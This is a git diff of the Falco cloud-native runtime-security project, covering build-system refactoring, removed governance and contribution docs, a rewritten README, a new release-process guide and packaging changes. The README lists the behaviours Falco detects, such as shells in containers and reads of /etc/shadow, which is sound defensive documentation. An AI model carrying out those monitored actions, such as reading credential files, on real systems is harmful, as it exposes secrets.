+  # OpenSSL
+  include(OpenSSL)

-# libcurl
-include(cURL)
-
-# LuaJIT
-set(LUAJIT_SRC "${PROJECT_BINARY_DIR}/luajit-prefix/src/luajit/src")
-message(STATUS "Using bundled LuaJIT in '${LUAJIT_SRC}'")
-set(LUAJIT_INCLUDE "${LUAJIT_SRC}")
-set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
-ExternalProject_Add(
-  luajit
-  URL "https://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
-  URL_HASH "SHA256=55be6cb2d101ed38acca32c5b1f99ae345904b365b642203194c585d27bebd79"
-  CONFIGURE_COMMAND ""
-  BUILD_COMMAND ${CMD_MAKE}
-  BUILD_IN_SOURCE 1
-  INSTALL_COMMAND "")
-
-# Lpeg
-set(LPEG_SRC "${PROJECT_BINARY_DIR}/lpeg-prefix/src/lpeg")
-set(LPEG_LIB "${PROJECT_BINARY_DIR}/lpeg-prefix/src/lpeg/build/lpeg.a")
-message(STATUS "Using bundled lpeg in '${LPEG_SRC}'")
-set(LPEG_DEPENDENCIES "")
-list(APPEND LPEG_DEPENDENCIES "luajit")
-ExternalProject_Add(
-  lpeg
-  DEPENDS ${LPEG_DEPENDENCIES}
-  URL "https://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
-  URL_HASH "SHA256=10190ae758a22a16415429a9eb70344cf29cbda738a6962a9f94a732340abf8e"
-  BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
-  BUILD_IN_SOURCE 1
-  CONFIGURE_COMMAND ""
-  INSTALL_COMMAND "")
-
-# libyaml
-find_library(LIBYAML_LIB NAMES libyaml.so)
-if(LIBYAML_LIB)
-  message(STATUS "Found libyaml: lib: ${LIBYAML_LIB}")
-else()
-  message(FATAL_ERROR "Couldn't find system libyaml")
+  # libcurl
+  include(cURL)
 endif()

+# LuaJIT
+include(luajit)
+
+# Lpeg
+include(lpeg)
+
+# libyaml
+include(libyaml)
+
 # lyaml
-set(LYAML_SRC "${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/ext/yaml")
-set(LYAML_LIB "${LYAML_SRC}/.libs/yaml.a")
-message(STATUS "Using bundled lyaml in '${LYAML_SRC}'")
-set(LYAML_DEPENDENCIES "")
-list(APPEND LYAML_DEPENDENCIES "luajit")
-ExternalProject_Add(
-  lyaml
-  DEPENDS ${LYAML_DEPENDENCIES}
-  URL "https://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
-  URL_HASH "SHA256=9d7cf74d776999ff6f758c569d5202ff5da1f303c6f4229d3b41f71cd3a3e7a7"
-  BUILD_COMMAND ${CMD_MAKE}
-  BUILD_IN_SOURCE 1
-  CONFIGURE_COMMAND ./configure --enable-static LIBS=-lyaml LUA_INCLUDE=-I${LUAJIT_INCLUDE} LUA=${LUAJIT_SRC}/luajit
-  INSTALL_COMMAND sh -c
-                  "cp -R ${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/lib/* ${PROJECT_SOURCE_DIR}/userspace/engine/lua")
+include(lyaml)

 # One TBB
 set(TBB_SRC "${PROJECT_BINARY_DIR}/tbb-prefix/src/tbb")
@@ -200,23 +167,31 @@ ExternalProject_Add(
  BUILD_BYPRODUCTS ${TBB_LIB}
  INSTALL_COMMAND "")

-# civetweb
-set(CIVETWEB_SRC "${PROJECT_BINARY_DIR}/civetweb-prefix/src/civetweb/")
-set(CIVETWEB_LIB "${CIVETWEB_SRC}/install/lib/libcivetweb.a")
-set(CIVETWEB_INCLUDE_DIR "${CIVETWEB_SRC}/install/include")
-message(STATUS "Using bundled civetweb in '${CIVETWEB_SRC}'")
-ExternalProject_Add(
-  civetweb
-  URL "https://github.com/civetweb/civetweb/archive/v1.11.tar.gz"
-  URL_HASH "SHA256=de7d5e7a2d9551d325898c71e41d437d5f7b51e754b242af897f7be96e713a42"
-  CONFIGURE_COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/lib
-  COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/include
-  BUILD_IN_SOURCE 1
-  BUILD_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" WITH_CPP=1
-  INSTALL_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" install-lib install-headers PREFIX=${CIVETWEB_SRC}/install "WITH_CPP=1")
+if(NOT MINIMAL_BUILD)
+  # civetweb
+  set(CIVETWEB_SRC "${PROJECT_BINARY_DIR}/civetweb-prefix/src/civetweb/")
+  set(CIVETWEB_LIB "${CIVETWEB_SRC}/install/lib/libcivetweb.a")
+  set(CIVETWEB_INCLUDE_DIR "${CIVETWEB_SRC}/install/include")
+  message(STATUS "Using bundled civetweb in '${CIVETWEB_SRC}'")
+  ExternalProject_Add(
+    civetweb
+    URL "https://github.com/civetweb/civetweb/archive/v1.11.tar.gz"
+    URL_HASH "SHA256=de7d5e7a2d9551d325898c71e41d437d5f7b51e754b242af897f7be96e713a42"
+    CONFIGURE_COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/lib
+    COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/include
+    BUILD_IN_SOURCE 1
+    BUILD_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" WITH_CPP=1
+    BUILD_BYPRODUCTS ${CIVETWEB_LIB}
+    INSTALL_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" install-lib install-headers PREFIX=${CIVETWEB_SRC}/install "WITH_CPP=1")
+endif()

-# gRPC
-include(gRPC)
+#string-view-lite
+include(DownloadStringViewLite)
+
+if(NOT MINIMAL_BUILD)
+  # gRPC
+  include(gRPC)
+endif()

 # sysdig
 include(sysdig)
@@ -224,11 +199,13 @@ include(sysdig)
 # Installation
 install(FILES falco.yaml DESTINATION "${FALCO_ETC_DIR}")

-# Coverage
-include(Coverage)
+if(NOT MINIMAL_BUILD)
+  # Coverage
+  include(Coverage)

-# Tests
-add_subdirectory(test)
+  # Tests
+  add_subdirectory(test)
+endif()

 # Rules
 add_subdirectory(rules)
@@ -239,6 +216,9 @@ add_subdirectory(docker)
 # Clang format
 # add_custom_target(format COMMAND clang-format --style=file -i $<TARGET_PROPERTY:falco,SOURCES> COMMENT "Formatting ..." VERBATIM)

+# Static analysis
+include(static-analysis)
+
 # Shared build variables
 set(FALCO_SINSP_LIBRARY sinsp)
 set(FALCO_SHARE_DIR share/falco)
@@ -246,6 +226,7 @@ set(FALCO_ABSOLUTE_SHARE_DIR "${CMAKE_INSTALL_PREFIX}/${FALCO_SHARE_DIR}")
 set(FALCO_BIN_DIR bin)

 add_subdirectory(scripts)
+add_subdirectory(userspace/libhawk)
 add_subdirectory(userspace/engine)
 add_subdirectory(userspace/falco)
 add_subdirectory(tests)
--- a/CODE_OF_CONDUCT.md
+++ b/CODE_OF_CONDUCT.md
@@ -1,38 +0,0 @@
-# CNCF Community Code of Conduct v1.0
-
-## Contributor Code of Conduct
-
-As contributors and maintainers of this project, and in the interest of fostering
-an open and welcoming community, we pledge to respect all people who contribute
-through reporting issues, posting feature requests, updating documentation,
-submitting pull requests or patches, and other activities.
-
-We are committed to making participation in this project a harassment-free experience for
-everyone, regardless of level of experience, gender, gender identity and expression,
-sexual orientation, disability, personal appearance, body size, race, ethnicity, age,
-religion, or nationality.
-
-Examples of unacceptable behavior by participants include:
-
-* The use of sexualized language or imagery
-* Personal attacks
-* Trolling or insulting/derogatory comments
-* Public or private harassment
-* Publishing other's private information, such as physical or electronic addresses,
- without explicit permission
-* Other unethical or unprofessional conduct.
-
-Project maintainers have the right and responsibility to remove, edit, or reject
-comments, commits, code, wiki edits, issues, and other contributions that are not
-aligned to this Code of Conduct. By adopting this Code of Conduct, project maintainers
-commit themselves to fairly and consistently applying these principles to every aspect
-of managing this project. Project maintainers who do not follow or enforce the Code of
-Conduct may be permanently removed from the project team.
-
-This code of conduct applies both within project spaces and in public spaces
-when an individual is representing the project or its community.
-
-Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting a CNCF project maintainer, [Sarah Novotny](mailto:sarahnovotny@google.com), and/or [Dan Kohn](mailto:dan@linuxfoundation.org).
-
-This Code of Conduct is adapted from the [Contributor Covenant](http://contributor-covenant.org), version 1.2.0, available at
-http://contributor-covenant.org/version/1/2/0/
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,149 +0,0 @@
-# Contributing to Falco
-
- [Contributing to Falco](#contributing-to-falco)
-  - [Code of Conduct](#code-of-conduct)
-  - [Issues](#issues)
-    - [Triage issues](#triage-issues)
-      - [More about labels](#more-about-labels)
-    - [Slack](#slack)
-  - [Pull Requests](#pull-requests)
-    - [Commit convention](#commit-convention)
-      - [Rule type](#rule-type)
-  - [Coding Guidelines](#coding-guidelines)
-    - [C++](#c)
-  - [Developer Certificate Of Origin](#developer-certificate-of-origin)
-
-## Code of Conduct
-
-Falco has a
-[Code of Conduct](CODE_OF_CONDUCT.md)
-to which all contributors must adhere, please read it before interacting with the repository or the community in any way.
-
-## Issues
-
-Issues are the heartbeat ❤️ of the Falco project, there are mainly three kinds of issues you can open:
-
- Bug report: you believe you found a problem in Falco and you want to discuss and get it fixed,
-creating an issue with the **bug report template** is the best way to do so.
- Enhancement: any kind of new feature need to be discussed in this kind of issue, do you want a new rule or a new feature? This is the kind of issue you want to open. Be very good at explaining your intent, it's always important that others can understand what you mean in order to discuss, be open and collaborative in letting others help you getting this done!
- Failing tests: you noticed a flaky test or a problem with a build? This is the kind of issue to triage that!
-
-The best way to get **involved** in the project is through issues, you can help in many ways:
-
- Issues triaging: participating in the discussion and adding details to open issues is always a good thing,
-sometimes issues need to be verified, you could be the one writing a test case to fix a bug!
- Helping to resolve the issue: you can help in getting it fixed in many ways, more often by opening a pull request.
-
-### Triage issues
-
-We need help in categorizing issues. Thus any help is welcome!
-
-When you triage an issue, you:
-
-* assess whether it has merit or not
-
-* quickly close it by correctly answering a question
-
-* point the reporter to a resource or documentation answering the issue
-
-* tag it via labels, projects, or milestones
-
-* take ownership submitting a PR for it, in case you want 😇
-
-#### More about labels
-
-These guidelines are not set in stone and are subject to change.
-
-Anyway a `kind/*` label for any issue is mandatory.
-
-This is the current [label set](https://github.com/falcosecurity/falco/labels) we have.
-
-You can use commands - eg., `/label <some-label>` to add (or remove) labels or manually do it.
-
-The commands available are the following ones:
-
-```
-/[remove-](area|kind|priority|triage|label)
-```
-
-Some examples:
-
-* `/area rules`
-* `/remove-area rules`
-* `/kind kernel-module`
-* `/label good-first-issue`
-* `/triage duplicate`
-* `/triage unresolved`
-* `/triage not-reproducible`
-* `/triage support`
-* ...
-
-### Slack
-
-Other discussion, and **support requests** should go through the `#falco` channel in the open source slack, please join [here](https://slack.sysdig.com).
-
-## Pull Requests
-
-Thanks for taking time to make a [pull request](https://help.github.com/articles/about-pull-requests) (hereafter PR).
-
-In the PR body, feel free to add an area label if appropriate by typing `/area <AREA>`, PRs will also
-need a kind, make sure to specify the appropriate one by typing `/kind <KIND>`.
-
-The list of labels is [here](https://github.com/falcosecurity/falco/labels).
-
-Also feel free to suggest a reviewer with `/cc @theirname`, or to assign an assignee using `/assign @nickname`.
-
-Once your reviewer is happy, they will say `/lgtm` which will apply the
-`lgtm` label, and will apply the `approved` label if they are an
-[owner](/OWNERS).
-
-Your PR will be automatically merged once it has the `lgtm` and `approved`
-labels, does not have any `do-not-merge/*` labels, and all status checks (eg., rebase, tests, DCO) are positive.
-
-### Commit convention
-
-As commit convention, we adopt [Conventional Commits v1.0.0](https://www.conventionalcommits.org/en/v1.0.0/), we have an history
-of commits that do not adopt the convention but any new commit must follow it to be eligible for merge.
-
-#### Rule type
-
-Besides the classic types, we adopt a type for rules, `rule(<scope>):`.
-Example:
-
-```
-rule(Write below monitored dir): make sure monitored dirs are monitored.
-```
-
-Each rule change must be on its own commit, if a change to a macro is done while changing a rule they can go together but only one rule per commit must happen.
-
-If you are changing only a macro, the commit will look like this:
-
-```
-rule(macro user_known_write_monitored_dir_conditions): make sure conditions are great
-```
-
-## Coding Guidelines
-
-### C++
-
-* File `userspace/engine/banned.h` defines some functions as invalid tokens. These functions are not allowed to be used in the codebase. Whenever creating a new cpp file, include the `"banned.h"` headers. This ensures that the banned functions are not compiled.
-
-  A complete list of banned functions can be found [here](./userspace/engine/banned.h).
-
-## Developer Certificate Of Origin
-
-The [Developer Certificate of Origin (DCO)](https://developercertificate.org/) is a lightweight way for contributors to certify that they wrote or otherwise have the right to submit the code they are contributing to the project.
-
-Contributors to the Falco project sign-off that they adhere to these requirements by adding a `Signed-off-by` line to commit messages.
-
-```
-This is my commit message
-
-Signed-off-by: John Poiana <jpoiana@falco.org>
-```
-
-Git even has a `-s` command line option to append this automatically to your commit message:
-
-```
-$ git commit -s -m 'This is my commit message'
-```
--- a/GOVERNANCE.md
+++ b/GOVERNANCE.md
@@ -1,55 +0,0 @@
-# Process for becoming a maintainer
-
-* Express interest to the existing maintainers that you or your organization is interested in becoming a
-  maintainer. Becoming a maintainer generally means that you are going to be spending substantial
-  time (>25%) on Falco for the foreseeable future. You should have domain expertise and be extremely
-  proficient in C++. Ultimately your goal is to become a maintainer that will represent your
-  organization.
-* We will expect you to start contributing increasingly complicated PRs, under the guidance
-  of the existing maintainers.
-* We may ask you to do some PRs from our backlog.
-* As you gain experience with the code base and our standards, we will ask you to do code reviews
-  for incoming PRs (i.e., all maintainers are expected to shoulder a proportional share of
-  community reviews).
-* After a period of approximately 2-3 months of working together and making sure we see eye to eye,
-  the existing maintainers will confer and decide whether to grant maintainer status or not.
-  We make no guarantees on the length of time this will take, but 2-3 months is the approximate
-  goal.
-
-## Maintainer responsibilities
-
-* Monitor Slack (delayed response is perfectly acceptable).
-* Triage GitHub issues and perform pull request reviews for other maintainers and the community.
-* During GitHub issue triage, apply all applicable [labels](https://github.com/falcosecurity/falco/labels)
-  to each new issue. Labels are extremely useful for future issue follow up. Which labels to apply
-  is somewhat subjective so just use your best judgment.
-* Make sure that ongoing PRs are moving forward at the right pace or closing them.
-* Participate when called upon in the security releases. Note that although this should be a rare
-  occurrence, if a serious vulnerability is found, the process may take up to several full days of
-  work to implement. This reality should be taken into account when discussing time commitment
-  obligations with employers.
-* In general continue to be willing to spend at least 25% of ones time working on Falco (~1.25
-  business days per week).
-
-## When does a maintainer lose maintainer status
-
-If a maintainer is no longer interested or cannot perform the maintainer duties listed above, they
-should volunteer to be moved to emeritus status. In extreme cases this can also occur by a vote of
-the maintainers per the voting process below.
-
-# Conflict resolution and voting
-
-In general, we prefer that technical issues and maintainer membership are amicably worked out
-between the persons involved. If a dispute cannot be decided independently, the maintainers can be
-called in to decide an issue. If the maintainers themselves cannot decide an issue, the issue will
-be resolved by voting. The voting process is a simple majority in which each senior maintainer
-receives two votes and each normal maintainer receives one vote.
-
-# Adding new projects to the falcosecurity GitHub organization
-
-New projects will be added to the falcosecurity organization via GitHub issue discussion in one of the
-existing projects in the organization. Once sufficient discussion has taken place (~3-5 business
-days but depending on the volume of conversation), the maintainers of *the project where the issue
-was opened* (since different projects in the organization may have different maintainers) will
-decide whether the new project should be added. See the section above on voting if the maintainers
-cannot easily decide.
--- a/2
+++ b/2
@@ -3,6 +3,7 @@ approvers:
  - kris-nova
  - leodido
  - mstemm
+  - leogr
 reviewers:
  - fntlnz
  - kaizhe
@@ -10,3 +11,4 @@ reviewers:
  - leodido
  - mfdii
  - mstemm
+  - leogr
--- a/README.md
+++ b/README.md
@@ -3,11 +3,11 @@

 <hr>

-# The Falco Project
-
 [![Build Status](https://img.shields.io/circleci/build/github/falcosecurity/falco/master?style=for-the-badge)](https://circleci.com/gh/falcosecurity/falco) [![CII Best Practices Summary](https://img.shields.io/cii/summary/2317?label=CCI%20Best%20Practices&style=for-the-badge)](https://bestpractices.coreinfrastructure.org/projects/2317) [![GitHub](https://img.shields.io/github/license/falcosecurity/falco?style=for-the-badge)](COPYING)

-#### Latest releases
+Want to talk? Join us on the [#falco](https://kubernetes.slack.com/archives/CMWH3EH32) channel in the [Kubernetes Slack](https://slack.k8s.io).
+
+### Latest releases

 Read the [change log](CHANGELOG.md).

@@ -19,66 +19,89 @@ Read the [change log](CHANGELOG.md).

 ---

-Falco is a behavioral activity monitor designed to detect anomalous activity in your applications. Falco audits a system at the most fundamental level, the kernel. Falco then enriches this data with other input streams such as container runtime metrics, and Kubernetes metrics. Falco lets you continuously monitor and detect container, application, host, and network activity—all in one place—from one source of data, with one set of rules.
+The Falco Project, originally created by [Sysdig](https://sysdig.com), is an incubating [CNCF](https://cncf.io) open source cloud native runtime security tool.
+Falco makes it easy to consume kernel events, and enrich those events with information from Kubernetes and the rest of the cloud native stack.
+Falco has a rich set of security rules specifically built for Kubernetes, Linux, and cloud-native.
+If a rule is violated in a system, Falco will send an alert notifying the user of the violation and its severity.

-Falco is hosted by the Cloud Native Computing Foundation (CNCF) as a sandbox level project. If you are an organization that wants to help shape the evolution of technologies that are container-packaged, dynamically-scheduled and microservices-oriented, consider joining the CNCF. For details read the [Falco CNCF project proposal](https://github.com/cncf/toc/tree/master/proposals/falco.adoc).
+### Installing Falco

-#### What kind of behaviors can Falco detect?
+If you would like to run Falco in **production** please adhere to the [official installation guide](https://falco.org/docs/getting-started/installation/).

-Falco can detect and alert on any behavior that involves making Linux system calls. Falco alerts can be triggered by the use of specific system calls, their arguments, and by properties of the calling process. For example, Falco can easily detect incidents including but not limited to:
+##### Kubernetes

- A shell is running inside a container.
+| Tool     | Link                                                                                       | Note                                                               |
+|----------|--------------------------------------------------------------------------------------------|--------------------------------------------------------------------|
+| Helm     | [Chart Repository](https://github.com/falcosecurity/charts/tree/master/falco#introduction) | The Falco community offers regular helm chart releases.            |
+| Minikube | [Tutorial](https://falco.org/docs/getting-started/third-party/#minikube)                                   | The Falco driver has been baked into minikube for easy deployment. |
+| Kind     | [Tutorial](https://falco.org/docs/getting-started/third-party/#kind)                                       | Running Falco with kind requires a driver on the host system.      |
+| GKE      | [Tutorial](https://falco.org/docs/getting-started/third-party/#gke)                                        | We suggest using the eBPF driver for running Falco on GKE.         |
+
+### Developing
+
+Falco is designed to be extensible such that it can be built into cloud-native applications and infrastructure.
+
+Falco has a [gRPC](https://falco.org/docs/grpc/) endpoint and an API defined in [protobuf](https://github.com/falcosecurity/falco/blob/master/userspace/falco/outputs.proto).
+The Falco Project supports various SDKs for this endpoint.
+
+##### SDKs
+
+| Language | Repository                                              |
+|----------|---------------------------------------------------------|
+| Go       | [client-go](https://github.com/falcosecurity/client-go) |
+| Rust     | [client-rs](https://github.com/falcosecurity/client-rs) |
+| Python   | [client-py](https://github.com/falcosecurity/client-py) |
+
+
+### What can Falco detect?
+
+Falco can detect and alert on any behavior that involves making Linux system calls.
+Falco alerts can be triggered by the use of specific system calls, their arguments, and by properties of the calling process.
+For example, Falco can easily detect incidents including but not limited to:
+
+- A shell is running inside a container or pod in Kubernetes.
 - A container is running in privileged mode, or is mounting a sensitive path, such as `/proc`, from the host.
 - A server process is spawning a child process of an unexpected type.
 - Unexpected read of a sensitive file, such as `/etc/shadow`.
 - A non-device file is written to `/dev`.
 - A standard system binary, such as `ls`, is making an outbound network connection.
+- A privileged pod is started in a Kubernetes cluster.

+### Documentation

-### Installing Falco
+The [Official Documentation](https://falco.org/docs/) is the best resource to learn about Falco.

-You can find the latest release downloads on the official [release archive](https://bintray.com/falcosecurity)
-
-Furthermore the comprehensive [installation guide](https://falco.org/docs/installation/) for Falco is available in the documentation website.
-
-#### How do you compare Falco with other security tools?
-
-One of the questions we often get when we talk about Falco is “How does Falco differ from other Linux security tools such as SELinux, AppArmor, Auditd, etc.?”. We wrote a [blog post](https://sysdig.com/blog/selinux-seccomp-falco-technical-discussion/) comparing Falco with other tools.
-
-
-Documentation
---
-
-See [Falco Documentation](https://falco.org/docs/) to quickly get started using Falco.
-
-Join the Community
---
+### Join the Community

 To get involved with The Falco Project please visit [the community repository](https://github.com/falcosecurity/community) to find more.

-License Terms
---
+How to reach out?

-Falco is licensed to you under the [Apache 2.0](./COPYING) open source license.
+ - Join the #falco channel on the [Kubernetes Slack](https://slack.k8s.io)
+ - [Join the Falco mailing list](https://lists.cncf.io/g/cncf-falco-dev)
+ - [Read the Falco documentation](https://falco.org/docs/)

-Contributing
---

-See the [CONTRIBUTING.md](./CONTRIBUTING.md).
+### Contributing

-Security
---
+See the [CONTRIBUTING.md](https://github.com/falcosecurity/.github/blob/master/CONTRIBUTING.md).

 ### Security Audit

 A third party security audit was performed by Cure53, you can see the full report [here](./audits/SECURITY_AUDIT_2019_07.pdf).

 ### Reporting security vulnerabilities
+
 Please report security vulnerabilities following the community process documented [here](https://github.com/falcosecurity/.github/blob/master/SECURITY.md).

+### License Terms
+
+Falco is licensed to you under the [Apache 2.0](./COPYING) open source license.
+
+
 [1]: https://dl.bintray.com/falcosecurity/rpm-dev
 [2]: https://dl.bintray.com/falcosecurity/rpm
 [3]: https://dl.bintray.com/falcosecurity/deb-dev/stable
 [4]: https://dl.bintray.com/falcosecurity/deb/stable
 [5]: https://dl.bintray.com/falcosecurity/bin-dev/x86_64
-[6]: https://dl.bintray.com/falcosecurity/bin/x86_64
+[6]: https://dl.bintray.com/falcosecurity/bin/x86_64
--- a/RELEASE.md
+++ b/RELEASE.md
@@ -0,0 +1,107 @@
+# Falco Release Process
+
+Our release process is mostly automated, but we still need some manual steps to initiate and complete it.
+
+Changes and new features are grouped in [milestones](https://github.com/falcosecurity/falco/milestones), the milestone with the next version represents what is going to be released.
+
+A release happens every two months ([as per community discussion](https://github.com/falcosecurity/community/blob/master/meeting-notes/2020-09-30.md#agenda)), and we need to assign owners for each (usually we pair a new person with an experienced one). Assignees and the due date are proposed during the [weekly community call](https://github.com/falcosecurity/community). Note that hotfix releases can happen as soon as it is needed.
+
+Finally, on the proposed due date the assignees for the upcoming release proceed with the processes described below.
+
+## Pre-Release Checklist
+
+Before cutting a release we need to do some homework in the Falco repository. This should take 5 minutes using the GitHub UI.
+
+### 1. Release notes
+- Find the LAST release (-1) and use `YYYY-MM-DD` as the day before of the [latest release](https://github.com/falcosecurity/falco/releases)
+- Check the release note block of every PR matching the `is:pr is:merged closed:>YYYY-MM-DD` [filter](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+closed%3A%3EYYYY-MM-DD)
+    - Ensure the release note block follows the [commit convention](https://github.com/falcosecurity/falco/blob/master/CONTRIBUTING.md#commit-convention), otherwise fix its content
+    - If the PR has no milestone, assign it to the milestone currently undergoing release
+- Check issues without a milestone (using [is:pr is:merged no:milestone closed:>YYYY-MM-DD](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYY-MM-DD) filter) and add them to the milestone currently undergoing release
+- Double-check that there are no more merged PRs without the target milestone assigned with the `is:pr is:merged no:milestone closed:>YYYY-MM-DD` [filters](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Amerged+no%3Amilestone+closed%3A%3EYYYY-MM-DD), if any, fix them
+
+### 2. Milestones
+
+- Move the [tasks not completed](https://github.com/falcosecurity/falco/pulls?q=is%3Apr+is%3Aopen) to a new minor milestone
+
+### 3. Release PR
+
+- Double-check if any hard-coded version number is present in the code, it should be not present anywhere:
+    - If any, manually correct it then open an issue to automate version number bumping later
+    - Versions table in the `README.md` updates itself automatically
+- Generate the change log https://github.com/leodido/rn2md:
+    - If you review timeout errors with `rn2md` try to generate an GitHub Oauth access token and use `-t`
+- Add the latest changes on top the previous `CHANGELOG.md`
+- Submit a PR with the above modifications
+- Await PR approval
+- Close the completed milestone as soon as the PR is merged
+
+## Release
+
+Now assume `x.y.z` is the new version.
+
+### 1. Create a tag
+
+- Once the release PR has got merged, and the CI has done its job on the master, git tag the new release
+
+    ```
+    git pull
+    git checkout master
+    git tag x.y.z
+    git push origin x.y.z
+    ```
+
+> **N.B.**: do NOT use an annotated tag
+
+- Wait for the CI to complete
+
+### 2. Update the GitHub release
+
+- [Draft a new release](https://github.com/falcosecurity/falco/releases/new)
+- Use `x.y.z` both as tag version and release title
+- Use the following template to fill the release description:
+    ```
+    <!-- Substitute x.y.z with the current release version -->
+
+    | Packages | Download                                                                                                                                               |
+    | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ |
+    | rpm      | [![rpm](https://img.shields.io/badge/Falco-x.y.z-%2300aec7?style=flat-square)](https://dl.bintray.com/falcosecurity/rpm/falco-x.y.z-x86_64.rpm)        |
+    | deb      | [![deb](https://img.shields.io/badge/Falco-x.y.z-%2300aec7?style=flat-square)](https://dl.bintray.com/falcosecurity/deb/stable/falco-x.y.z-x86_64.deb) |
+    | tgz      | [![tgz](https://img.shields.io/badge/Falco-x.y.z-%2300aec7?style=flat-square)](https://dl.bintray.com/falcosecurity/bin/x86_64/falco-x.y.z-x86_64.deb) |
+
+    | Images                                                                      |
+    | --------------------------------------------------------------------------- |
+    | `docker pull docker.io/falcosecurity/falco:x.y.z`                           |
+    | `docker pull public.ecr.aws/falcosecurity/falco:x.y.z`                      |
+    | `docker pull docker.io/falcosecurity/falco-driver-loader:x.y.z`             |
+    | `docker pull docker.io/falcosecurity/falco-no-driver:x.y.z`                 |
+
+    ### Statistics
+
+    | Merged PRs      | Number |
+    | --------------- | ------ |
+    | Not user-facing | x      |
+    | Release note    | x      |
+    | Total           | x      |
+
+    <!-- Calculate stats and fill the above table -->
+    ```
+
+- Finally, publish the release!
+
+### 3. Update the meeting notes
+
+For each release we archive the meeting notes in git for historical purposes.
+
+ - The notes from the Falco meetings can be [found here](https://hackmd.io/6sEAlInlSaGnLz2FnFz21A).
+    - Note: There may be other notes from working groups that can optionally be added as well as needed.
+ - Add the entire content of the document to a new file in [github.com/falcosecurity/community/tree/master/meeting-notes](https://github.com/falcosecurity/community/tree/master/meeting-notes) as a new file labeled `release-x.y.z.md`
+ - Open up a pull request with the new change.
+
+
+## Post-Release tasks
+
+Announce the new release to the world!
+
+- Send an announcement to cncf-falco-dev@lists.cncf.io (plain text, please)
+- Let folks in the slack #falco channel know about a new release came out
--- a/brand/README.md
+++ b/brand/README.md
@@ -15,6 +15,21 @@ There are 3 logos available for use in this directory. Use the primary logo unle

 The Falco logo is Apache 2 licensed and free to use in media and publication for the CNCF Falco project.

+### Colors
+
+| Name      | PMS  | RGB         |
+|-----------|------|-------------|
+| Teal      | 3125 |   0 174 199 |
+| Cool Gray |   11 |  83  86  90 |
+| Black     |      |   0   0   0 |
+| Blue-Gray | 7700 |  22 92 125  |
+| Gold      | 1375 | 255 158  27 |
+| Orange    |  171 | 255  92  57 |
+| Emerald   | 3278 |   0 155 119 |
+| Green     |  360 | 108 194  74 |
+
+The primary colors are those in the first two rows.
+
 ### Slogan

 > Cloud Native Runtime Security
--- a/brand/teal-logo.svg
+++ b/brand/teal-logo.svg
--- a/cmake/modules/CPackConfig.cmake
+++ b/cmake/modules/CPackConfig.cmake
@@ -1,3 +1,16 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
 set(CPACK_PACKAGE_NAME "${PACKAGE_NAME}")
 set(CPACK_PACKAGE_VENDOR "Cloud Native Computing Foundation (CNCF) cncf.io.")
 set(CPACK_PACKAGE_CONTACT "cncf-falco-dev@lists.cncf.io") # todo: change this once we've got @falco.org addresses
@@ -12,19 +25,29 @@ set(CPACK_PROJECT_CONFIG_FILE "${PROJECT_SOURCE_DIR}/cmake/cpack/CMakeCPackOptio
 set(CPACK_STRIP_FILES "ON")
 set(CPACK_PACKAGE_RELOCATABLE "OFF")

-set(CPACK_GENERATOR DEB RPM TGZ)
+if(NOT CPACK_GENERATOR)
+    set(CPACK_GENERATOR DEB RPM TGZ)
+endif()

+message(STATUS "Using package generators: ${CPACK_GENERATOR}")
+message(STATUS "Package architecture: ${CMAKE_SYSTEM_PROCESSOR}")
 set(CPACK_DEBIAN_PACKAGE_SECTION "utils")
-set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "amd64")
+
+if(${CMAKE_SYSTEM_PROCESSOR} STREQUAL "x86_64")
+  set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "amd64")
+endif()
+if(${CMAKE_SYSTEM_PROCESSOR} STREQUAL "aarch64")
+  set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "arm64")
+endif()
 set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "https://www.falco.org")
-set(CPACK_DEBIAN_PACKAGE_DEPENDS "dkms (>= 2.1.0.0), libyaml-0-2")
+set(CPACK_DEBIAN_PACKAGE_DEPENDS "dkms (>= 2.1.0.0)")
 set(CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA
    "${CMAKE_BINARY_DIR}/scripts/debian/postinst;${CMAKE_BINARY_DIR}/scripts/debian/prerm;${CMAKE_BINARY_DIR}/scripts/debian/postrm;${PROJECT_SOURCE_DIR}/cmake/cpack/debian/conffiles"
 )

 set(CPACK_RPM_PACKAGE_LICENSE "Apache v2.0")
 set(CPACK_RPM_PACKAGE_URL "https://www.falco.org")
-set(CPACK_RPM_PACKAGE_REQUIRES "dkms, kernel-devel, libyaml, ncurses")
+set(CPACK_RPM_PACKAGE_REQUIRES "dkms, kernel-devel, ncurses")
